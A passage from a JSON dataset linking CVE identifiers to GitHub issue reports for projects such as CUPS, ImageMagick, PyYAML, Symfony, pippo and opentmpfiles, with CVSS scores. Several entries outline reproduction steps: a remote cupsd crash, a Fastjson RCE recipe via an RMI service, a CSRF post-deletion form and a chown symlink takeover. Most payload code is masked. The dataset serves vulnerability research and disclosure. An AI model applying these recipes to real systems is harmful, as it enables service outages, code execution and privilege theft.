        "description": "Remote APITAG attack against cupsd via invalid username and malicious D Bus library. Any user who can submit a print job to a CUPS server can abort the cupsd running on the CUPS server by submitting a job as a user with an invalid username. I tested it with CUPS NUMBERTAG and also the newest NUMBERTAG so that I assume the issue is old and not fixed. I think this issue here has the same root cause as URLTAG As far as I see the fix there belongs to the LPD mini daemon but this issue here belongs to the cupsd. How to reproduce: On a APITAG client system create a user with an invalid username I use 'bin\u00e4r' as username that has the character \u00e4 APITAG small letter a with diaeresis, e.g. the German a umlaut) encoded in ISO NUMBERTAG encoding so that that username in hex byte values is APITAG NUMBERTAG e e NUMBERTAG APITAG Usually one cannot create such a username with \"useradd\" (because it rejects invalid usernames) so that one must manually edit /etc/passwd. Then as this user submit a print job from the client system to a (possibly remote) CUPS server. The cupsd on the CUPS server will bet aborted inside a D Bus library call that sends SIGABRT which aborts the whole caller process. In PATHTAG or nowadays in the \"journalctl\" one gets things like APITAG NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG process NUMBERTAG arguments to APITAG were incorrect, assertion \"_dbus_check_is_valid_utf8 ( string_p)\" failed in file dbus message.c line NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG This is normally a bug in some application using the D Bus library NUMBERTAG APITAG e NUMBERTAG cupsd NUMBERTAG D Bus not built with rdynamic so unable to print a backtrace NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Main process exited, code=dumped, status NUMBERTAG ABRT NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Unit entered failed state NUMBERTAG APITAG e NUMBERTAG systemd NUMBERTAG APITAG Failed with result 'core dump NUMBERTAG APITAG e NUMBERTAG systemd coredump NUMBERTAG Process NUMBERTAG cupsd) of user NUMBERTAG dumped core. APITAG or APITAG Oct NUMBERTAG caps cupsd NUMBERTAG process NUMBERTAG arguments to APITAG were incorrect, assertion \"_dbus_check_is_valid_utf8 ( string_p)\" failed in file dbus message.c line NUMBERTAG Oct NUMBERTAG caps cupsd NUMBERTAG This is normally a bug in some application using the D Bus library. Oct NUMBERTAG caps cupsd NUMBERTAG D Bus not built with rdynamic so unable to print a backtrace APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2017-18250",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/793",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/793",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-30T07:07:50Z",
        "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so the following operations on the \"log\" will dereference null pointer to cause memory error.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18251",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/809",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/809",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-30T07:26:22Z",
        "description": "memory leak in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL,if one of the \u201cchroma1\u201d \u3001\u201cchroma2\u201d and \u201dluma\u201d is NULL at least\uff0cand the other is not\uff0cthis may cause memory leak error in \u201cIf statement\u201d.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18252",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/802",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/802",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-30T07:15:01Z",
        "description": "assertion failure in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL (in line NUMBERTAG and in APITAG CODETAG If the \"replace\" is NULL,it will may cause assertion failure.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18253",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/794",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/794",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-30T07:08:32Z",
        "description": "null pointer dereference in APITAG Here is the critical code: (in APITAG CODETAG APITAG may return NULL, so some of the following operations on the \"device >platform_name\" will dereference null pointer to cause memory error.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18254",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/808",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/808",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-30T07:24:57Z",
        "description": "memory leak in APITAG Here is the critical code : (in APITAG ERRORTAG APITAG may return NULL,if one of the \u201cglobal_colormap\u201d and \u201dcolormap\u201d is NULL\uff0cand the other is not\uff0cthis may cause memory leak error in \u201cIf statement\u201d.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18271",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/911",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/911",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-22T05:36:06Z",
        "description": "CPU exhaustion in APITAG INFO Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following CODETAG Trigger Command: magick convert cpu exhaustion APITAG /dev/null DEBUG when debug we found the following code is lack of EOF check, which cause a infinite loop ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18272",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/918",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/918",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-26T01:16:50Z",
        "description": "heap use after free in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG identify verbose use after free APITAG ASAN OUTPUT ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18273",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/910",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/910",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-12-22T02:51:14Z",
        "description": "cpu exhaustion in APITAG INFO Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU and Memory consumption. (CPU NUMBERTAG Memory NUMBERTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib cairo djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png rsvg tiff webp wmf x xml zlib The FILETAG is as following APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Trigger Command: magick convert ./cpu exhaustion APITAG /dev/null DEBUG When debug we found a infinite loop in APITAG at APITAG CODETAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18342",
        "Issue_Url_old": "https://github.com/marshmallow-code/apispec/issues/278",
        "Issue_Url_new": "https://github.com/marshmallow-code/apispec/issues/278",
        "Repo_new": "marshmallow-code/apispec",
        "Issue_Created_At": "2018-09-04T17:18:15Z",
        "description": "Use APITAG in 'load_yaml_from_docstring'. Hi there! APITAG for providing a great project. Because APITAG has known security issues URLTAG , would it be feasible to use the existing APITAG option instead of APITAG here URLTAG for APITAG ? I'm happy to put in a PR if you agree. It looks like FILETAG . It doesn't look like there's been much activity by APITAG to move forward with making APITAG safe by default. Here is the pending APITAG NUMBERTAG release plan: URLTAG The APITAG security vulnerability is being flagged for our FEC API URLTAG . Please let me know if you have any questions, and thanks! Laura",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18342",
        "Issue_Url_old": "https://github.com/yaml/pyyaml/issues/193",
        "Issue_Url_new": "https://github.com/yaml/pyyaml/issues/193",
        "Repo_new": "yaml/pyyaml",
        "Issue_Created_At": "2018-06-29T18:44:32Z",
        "description": "APITAG NUMBERTAG Release Plan. Synopsis Make release NUMBERTAG with current master Make PR to revert NUMBERTAG APITAG team fixes broken pyyaml build system Builds wheels with libyaml NUMBERTAG linked in Fix any other NUMBERTAG blocker issues Merge in successor to NUMBERTAG IF_ it reaches approval consensus Release NUMBERTAG to APITAG Continue to work on successor if not part of NUMBERTAG Bump version to NUMBERTAG when merged The APITAG Release Situatation The most recent APITAG NUMBERTAG was released Aug NUMBERTAG At that time, Kirill turned over maintenance of APITAG and APITAG to MENTIONTAG and MENTIONTAG . Since then about NUMBERTAG PRs have been applied to APITAG and about NUMBERTAG to APITAG APITAG has a release builder: URLTAG It builds APITAG wheels against specific versions combinations of APITAG APITAG APITAG This builder no longer works and it's complicated by the fact that the build process for libyaml has been changed. The APITAG team is working hard to fix it. The NUMBERTAG release attempt was rushed out because we knew that APITAG NUMBERTAG doesn't work with Python NUMBERTAG which went out this week. We had a fix for that in master, and so we tried to get it out in time for NUMBERTAG We thought we had a Jenkins build system that would build the wheels as soon as the sdist was uploaded. So we pushed the release only to find out minutes later that this build system wasn't set up to build with libyaml. We were going to have to use the pyyaml build system. After NUMBERTAG hours of work on the windows/wheels system we decided to pull the plug on NUMBERTAG We didn't have wheels and we were getting reports of other things that were wrong. We didn't have a sense that the build system was going to get fixed soon, and we are all volunteers with limited time. Soon after the release I learned about PR NUMBERTAG and was completely surprised to find that something this big went in without my seeing it. Looking back now I remember that I had a lot going on in my life at that specific time NUMBERTAG is a non backwards compatible change at the most basic level. It changes how the dump and load functions behave. The intent of the change is a good one: Currently APITAG has the sugar API: dump, load, safe_dump, safe_load APITAG has had that API since version NUMBERTAG APITAG NUMBERTAG APITAG is trivial to exploit on untrusted data Change load and dump to be aliases to safe_load and safe_dump Add alarming (danger_ ) new functions for the old load and dump But this change has contentions: It's non back compat and is going to affect a ton of existing code The name danger is misleading when used in completely safe ways In addition, danger_dump is not known to be exploitable in any way APITAG has known about this and had a safe_ solution in place from the start People are just not feeling comfortable with the defaults The change is important, worthy of a major release, but is not ready to be part of APITAG in its current form. A new PR, building from NUMBERTAG and NUMBERTAG should be worked on. The Current Plan Forward We need to get APITAG released soon, if only for the Python NUMBERTAG release. We can't make any release at all until the build system works again. IOW, we couldn't even re release NUMBERTAG right now. The NUMBERTAG API change is big and it is more important to get it right than to rush it out. ie It APITAG may be a big can of gasoline, but nothing's on fire. ie NUMBERTAG doesn't \"fix\" anything. It just changes a default to something that's always been safe and available. There are NUMBERTAG other changes that I'd like to tackle in the next release, while at the same time taming a broken release process. My hope is that when we figure this out, it will be easy to put out APITAG releases on a regular basis. We went from NUMBERTAG to NUMBERTAG because this was a big release. It's big with or without NUMBERTAG I would like to see APITAG NUMBERTAG get out in the next few days. If the successor to NUMBERTAG is ready and approved by the time we are ready to upload NUMBERTAG it can go in. If not, then I think it should be the focus of a NUMBERTAG release. It's a big enough change to trigger a major release. It should be in the first release of either NUMBERTAG or NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18343",
        "Issue_Url_old": "https://github.com/symfony/symfony/issues/27987",
        "Issue_Url_new": "https://github.com/symfony/symfony/issues/27987",
        "Repo_new": "symfony/symfony",
        "Issue_Created_At": "2018-07-18T22:16:19Z",
        "description": "Security Vulnerability Cross site Scripting. Symfony Debug version(s) affected NUMBERTAG Injection Technical Details URL: PATHTAG NUMBERTAG APITAG =om3rcitak Parameter Type: Parameter Name Attack Pattern: APITAG APITAG Repro $ APITAG $ cd laravel $ APITAG $ APITAG $ php artisan serve and visit: PATHTAG NUMBERTAG APITAG =om3rcitak Possible Solution Actually your fix this vulnerability NUMBERTAG ersion but laravel NUMBERTAG using symfony/debug NUMBERTAG Your should be same fix for NUMBERTAG ersions. Notes: I am testing laravel debugger latest version NUMBERTAG for Laravel NUMBERTAG This vulnerability not effected Laravel NUMBERTAG or laravel debugger NUMBERTAG because Laravel using different error page template for version NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18343",
        "Issue_Url_old": "https://github.com/barryvdh/laravel-debugbar/issues/850",
        "Issue_Url_new": "https://github.com/barryvdh/laravel-debugbar/issues/850",
        "Repo_new": "barryvdh/laravel-debugbar",
        "Issue_Created_At": "2018-07-18T21:38:40Z",
        "description": "Security Vulnerability Cross site Scripting. Security Vulnerability Cross site Scripting Environment Version : debugbar NUMBERTAG laravel NUMBERTAG OS : Unix, Windows Web server : Any web server PHP : APITAG alert NUMBERTAG APITAG =om3rcitak Parameter Type: Parameter Name Attack Pattern: APITAG APITAG Repro $ APITAG $ cd laravel $ APITAG $ APITAG $ php artisan serve and visit: PATHTAG NUMBERTAG APITAG =om3rcitak Notes: I am testing laravel debugger latest version NUMBERTAG for Laravel NUMBERTAG This vulnerability not effected Laravel NUMBERTAG or laravel debugger NUMBERTAG because Laravel using different error page template for version NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18349",
        "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/466",
        "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/466",
        "Repo_new": "pippo-java/pippo",
        "Issue_Created_At": "2018-10-15T05:11:23Z",
        "description": "lead to RCE when parse JSON string with Fastjson. The component APITAG converts a JSON string to an equivalent Java Object based on Fastjson(version NUMBERTAG APITAG version NUMBERTAG and prior has a remote code execution vulnerability. for details,please refer to the links below: URLTAG URLTAG APITAG Upgrade to Fastjson version NUMBERTAG or later can fix the issue. Using the following code snippet to convert a JSON string: CODETAG To exploit the vulnerability successfully,we need the following steps: step1:start a rmi service; ERRORTAG step2:put the APITAG under a web service directory which pointed by the rmi service above; ERRORTAG step3:send a post request contains the malicious JSON string; FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18361",
        "Issue_Url_old": "https://github.com/Pylons/colander/issues/290",
        "Issue_Url_new": "https://github.com/pylons/colander/issues/290",
        "Repo_new": "pylons/colander",
        "Issue_Created_At": "2017-04-26T09:11:05Z",
        "description": "Unclosed parenthesis in URL causes infinite loop. When there is an unclosed parenthesis in URL and we use _url_ validator, it causes an infinite loop. What's more interesting is that it only happens when the unclosed parenthesis is followed by many characters (check test case number NUMBERTAG and NUMBERTAG CODETAG In addition, if you check it in an online regex checker ( URLTAG it also fails. Try this regex, it's used for URL validation in colander. It's taken from PATHTAG I only escaped two slashes here. APITAG Use this URL: _ FILETAG and you'll get _catastrophic backtracking_. You can use debugger on that site to check which group falls in infinite loop.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18366",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/477",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/477",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2017-06-30T19:41:33Z",
        "description": "Critical : Remove Blog Post using CSRF attack. Hi subrion security team, Bug Description Cross site request forgery(CSRF), also known as a one click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Steps to reproduce CODETAG NUMBERTAG Save this as FILETAG NUMBERTAG Replace <post id> to post number which post you want to delete NUMBERTAG now open FILETAG via browser where you logged in with Subrion CMS NUMBERTAG Click on Submit request button NUMBERTAG the post will delete automatically. Impact An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. How to fix this vulnerability Check if this form requires CSRF protection and implement CSRF countermeasures if necessary. Regards, Rudra Sarkar URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18367",
        "Issue_Url_old": "https://github.com/seccomp/libseccomp-golang/issues/22",
        "Issue_Url_new": "https://github.com/seccomp/libseccomp-golang/issues/22",
        "Repo_new": "seccomp/libseccomp-golang",
        "Issue_Created_At": "2017-04-19T19:56:01Z",
        "description": "BUG: Handling of multiple syscall arguments incorrect. Issue originally identified at URLTAG Presently, when adding a rule with multiple syscall arguments, we add each argument separately with a separate call to APITAG and a single syscall specified. This produces an OR relationship between the arguments IE, we will match if any of the arguments match. However, using libseccomp directly, adding multiple rules at the same time with a single API call will result in an AND relationship the rule will only match if all of the arguments match. Matching the behavior of the library is important, and at present use cases requiring APITAG syscall rules are not supported.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18376",
        "Issue_Url_old": "https://github.com/TheHive-Project/TheHive/issues/408",
        "Issue_Url_new": "https://github.com/thehive-project/thehive/issues/408",
        "Repo_new": "thehive-project/thehive",
        "Issue_Created_At": "2017-12-22T15:13:08Z",
        "description": "THP SEC AD NUMBERTAG Privilege Escalation in all Versions of APITAG Request Type Bug Problem Description A privilege escalation vulnerability has been identified in APITAG It allows users with read only or read/write access to escalate their privileges and eventually become administrators. Conditions To exploit the vulnerability, an attacker must have access to an account on APITAG with read only or read/write privileges. The attacker needs to interact with the API in a specific though trivial way to obtain administrator privileges. After verifying that their request has been correctly processed, they connect To APITAG using the Web UI and they will see the administrator menu from where they can edit or lock user accounts, add case templates, etc. Impacted Versions This vulnerability impacts all versions of APITAG as of this writing, including APITAG NUMBERTAG APITAG NUMBERTAG Possible Solutions APITAG Project has confirmed the vulnerability and a hotfix for Mellifera NUMBERTAG APITAG NUMBERTAG and Cerana NUMBERTAG APITAG NUMBERTAG will be released very soon. Credits The vulnerability has been found and reported by Jeffrey Everling.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18594",
        "Issue_Url_old": "https://github.com/nmap/nmap/issues/1227",
        "Issue_Url_new": "https://github.com/nmap/nmap/issues/1227",
        "Repo_new": "nmap/nmap",
        "Issue_Created_At": "2018-05-27T23:28:05Z",
        "description": "Crash in libssh when port NUMBERTAG response is unexpected. Nmap NUMBERTAG crashes when running either of the following two scripts against an open port NUMBERTAG which is not recognised as SSH: APITAG and APITAG . ERRORTAG I managed to narrow it down to these scripts and one particular host, and created a minimised test case that can be run locally: APITAG APITAG This will cause a crash, sometimes with Segmentation fault or sometimes with double free or corruption . Sample output with APITAG : ERRORTAG If I disable those two scripts, then Nmap doesn't crash, and the host output looks like: CODETAG Hope that helps in diagnosing the issue. Please can you look into it?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18594",
        "Issue_Url_old": "https://github.com/nmap/nmap/issues/1077",
        "Issue_Url_new": "https://github.com/nmap/nmap/issues/1077",
        "Repo_new": "nmap/nmap",
        "Issue_Created_At": "2017-12-04T20:18:13Z",
        "description": "NMAP crash with ssh auth APITAG When testing ssh auth methods.nse against non standard ports, I forgot to specify ports and NMAP crashed. I have narrowed it down to running the script against port NUMBERTAG I ran a debug and found the crash appears to be caused by a double free of session data. This appears to be due to a session pointer not being APITAG after the session is freed. Attached is a patch that appears to fix the issue. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18635",
        "Issue_Url_old": "https://github.com/novnc/noVNC/issues/748",
        "Issue_Url_new": "https://github.com/novnc/novnc/issues/748",
        "Repo_new": "novnc/novnc",
        "Issue_Created_At": "2017-01-12T19:58:56Z",
        "description": "FILETAG , as well as APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-18638",
        "Issue_Url_old": "https://github.com/graphite-project/graphite-web/issues/2008",
        "Issue_Url_new": "https://github.com/graphite-project/graphite-web/issues/2008",
        "Repo_new": "graphite-project/graphite-web",
        "Issue_Created_At": "2017-07-28T22:37:00Z",
        "description": "APITAG vulnerable to SSRF. (I didn't discover this, it was publicly described here: URLTAG URLTAG Some sort of validation should be performed on the server component of the URL (possibly a whitelist in settings ? I'm not overly familiar with the design of this module). Currently it's possible to use this view to make HTTP requests to services visible from the server.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18869",
        "Issue_Url_old": "https://github.com/isaacs/chownr/issues/14",
        "Issue_Url_new": "https://github.com/isaacs/chownr/issues/14",
        "Repo_new": "isaacs/chownr",
        "Issue_Created_At": "2017-07-02T07:22:36Z",
        "description": "This package appears to have a TOCTOU bug. CVETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 2.5,
        "impactScore": 1.4,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2017-18924",
        "Issue_Url_old": "https://github.com/oauthjs/node-oauth2-server/issues/637",
        "Issue_Url_new": "https://github.com/oauthjs/node-oauth2-server/issues/637",
        "Repo_new": "oauthjs/node-oauth2-server",
        "Issue_Created_At": "2020-07-16T00:26:02Z",
        "description": "Multiple Security Vulnerabilities in Auth and Token Endpoint. I would like to report several security vulnerabilities that I found while using this APITAG server library. The vulnerabilities and their consequences are listed as following: Vulnerability NUMBERTAG Missing PKCE support for public clients. APITAG As specified in RFC NUMBERTAG URLTAG public clients (e.g., mobile/desktop apps) using Authorization Code Flow are susceptible to authorization code interception attack and PKCE is recommended to mitigate this attack. Since public clients cannot maintain client side confidentiality regarding client secrets, such attacks have been noticed in the wild extensively. Vulnerability NUMBERTAG Does not revoke previously issued token if authorization_code is used more than once. APITAG As specified in RFC NUMBERTAG FILETAG If an authorization code is used more than once, the authorization server must deny the request and should revoke all tokens previously issued based on that authorization code. Though APITAG server currently denies the request in such cases, it doesn't revoke the tokens issued previously to the client, which leaves the user's resources vulnerable as attackers might exploit the previous tokens to get them. Vulnerability NUMBERTAG Allows fragment in the redirect URI. APITAG Many APITAG attacks regarding misuse of redirect uris have been observed in the wild. As specified in the RFC NUMBERTAG FILETAG authorization server should not allow fragments in the redirect uri as it allows the attackers to exploit the redirect uri and hence intercept the auth_code/token. Any comments or fixes regarding these vulnerabilities? Thank you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-18925",
        "Issue_Url_old": "https://github.com/OpenRC/opentmpfiles/issues/4",
        "Issue_Url_new": "https://github.com/openrc/opentmpfiles/issues/4",
        "Repo_new": "openrc/opentmpfiles",
        "Issue_Created_At": "2017-12-24T15:04:21Z",
        "description": "Unsafe use of \"chown dereference\" in directory types. The default behavior of chown when called _without_ the APITAG flag is to follow symlinks. At least the d type, and possibly the f type, can exploit that fact to take ownership of arbitrary files on the system. For example, CODETAG The first time that opentmpfiles setup is run, things are fine; but then suppose I replace \"foo\" with a symlink: APITAG and restart the service... ERRORTAG The call to chown has followed my symlink, and given me ownership of APITAG : APITAG The tmpfiles specification is silent on whether or not symlinks should be followed in this case, however, the same vulnerability was addressed in APITAG checkpath helper in Gentoo bug NUMBERTAG CVETAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-20004",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/41622",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/41622",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2017-04-29T07:11:01Z",
        "description": "APITAG APITAG must not be sync. Right now, APITAG satisfies the Sync bound. That is rather bad, because it lets me write a program that has a data race: ERRORTAG The get and set calls in the two threads are unsynchronized (as usual for a Cell ), and they are racing. This is a soundness bug. The cause for this is that APITAG implements Sync whenever T implements Send , which is plain wrong. The fix is to let APITAG implements Sync whenever T implements Sync . I will submit a PR soon.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-3204",
        "Issue_Url_old": "https://github.com/golang/go/issues/19767",
        "Issue_Url_new": "https://github.com/golang/go/issues/19767",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2017-03-29T15:29:51Z",
        "description": "PATHTAG make APITAG APITAG non permissive by default. APITAG interprets nil as \"accept any host keys\". This is not a great default from a security perspective. Many clients probably should set APITAG to something real but are not. It was written this way in PATHTAG to preserve backwards compatibility with the original implementation, but that was probably not the right balance to strike. This issue is to make APITAG mean \"reject all host keys\" and at the same time provide at least func APITAG APITAG func APITAG []byte) APITAG and maybe also func APITAG string) APITAG Thanks to Phil Pennock for pointing out this problem.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
